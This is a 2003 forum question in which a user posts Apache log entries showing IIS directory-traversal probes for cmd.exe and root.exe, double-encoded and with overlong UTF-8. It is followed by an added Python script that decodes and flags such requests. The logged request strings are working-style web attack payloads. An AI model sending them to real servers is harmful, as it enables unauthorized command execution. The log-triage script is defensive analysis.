yodaj007
asked on
security problem, fix?
I'm getting a lot of GET requests from one particular IP addy, but I'm not sure what he's trying to do. Here's some of the log entries:
68.83.207.195 - - [24/Feb/2003:13:46:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.83.207.195 - - [24/Feb/2003:13:46:58 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.83.207.195 - - [24/Feb/2003:13:46:59 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.83.207.195 - - [24/Feb/2003:13:47:02 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.83.207.195 - - [24/Feb/2003:13:47:03 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.83.207.195 - - [24/Feb/2003:13:47:03 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
68.83.207.195 - - [24/Feb/2003:13:47:04 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:04 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:05 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:05 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:06 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.83.207.195 - - [24/Feb/2003:13:47:07 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.83.207.195 - - [24/Feb/2003:13:47:08 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.83.207.195 - - [24/Feb/2003:13:47:09 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
=========================================
Please tell me what he's doing and what I can do to stop anything malicious. I'm running XP with the latest Apache.
Thanks,
(This question's worth a lot of points)
Jason
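A triage sketch for log entries like those in the question, added here as an example and not part of the original thread: it percent-decodes each request path until it stops changing, tags directory-traversal sequences and cmd.exe/root.exe targets, and records whether any flagged request received a 2xx status. The function names, tag names and the benign 192.0.2.10 line are constructed for illustration; the other four sample lines are entries from the question.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes
# Four entries from the question plus one constructed benign request (192.0.2.10).
SAMPLE_LOG = """\
68.83.207.195 - - [24/Feb/2003:13:46:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.83.207.195 - - [24/Feb/2003:13:47:05 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:06 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
192.0.2.10 - - [24/Feb/2003:13:48:00 -0600] "GET /index.html HTTP/1.0" 200 1024
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]\n]+\] "\S+ (\S+) [^"\n]*" (\d{3}) ', re.M)

def decode_fully(path, max_rounds=5):  # percent-decode until the bytes stop changing
    data = path.encode("utf-8")
    for rounds in range(max_rounds):
        nxt = unquote_to_bytes(data)
        if nxt == data:
            return data, rounds
        data = nxt
    return data, max_rounds

def classify(target):  # tag a request target by what its fully decoded path contains
    data, rounds = decode_fully(target.split("?", 1)[0])
    low, tags = data.lower(), []
    if rounds > 1:                              # e.g. %255c or %%35%63
        tags.append("multi-encoded")
    if b"\xc0" in data or b"\xc1" in data:      # lead bytes that never occur in valid UTF-8
        tags.append("bad-utf8")
    if b"../" in low or b"..\\" in low:
        tags.append("traversal")
    if low.endswith((b"/cmd.exe", b"/root.exe")):
        tags.append("shell-probe")
    return tags

def triage(log_text):  # per source IP: tag counts, status counts, probes answered 2xx
    report = {}
    for ip, target, status in LOG_RE.findall(log_text):
        tags = classify(target)
        if not tags:
            continue
        entry = report.setdefault(ip, {"tags": Counter(), "statuses": Counter(), "served": []})
        entry["tags"].update(tags)
        entry["statuses"][status] += 1
        if status.startswith("2"):              # a flagged request the server actually served
            entry["served"].append(target)
    return report

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

An empty `served` list with only 4xx entries in `statuses` means every flagged request was refused.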